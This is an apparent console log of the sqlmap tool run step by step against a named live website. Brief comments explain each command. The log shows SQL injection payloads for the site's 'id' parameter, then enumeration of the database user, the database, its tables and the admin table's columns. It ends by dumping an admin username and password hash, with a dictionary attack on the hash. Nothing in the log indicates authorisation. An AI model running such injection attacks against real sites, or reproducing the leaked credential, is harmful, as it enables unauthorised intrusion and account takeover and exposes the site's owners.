D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* note: get the current user name */

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>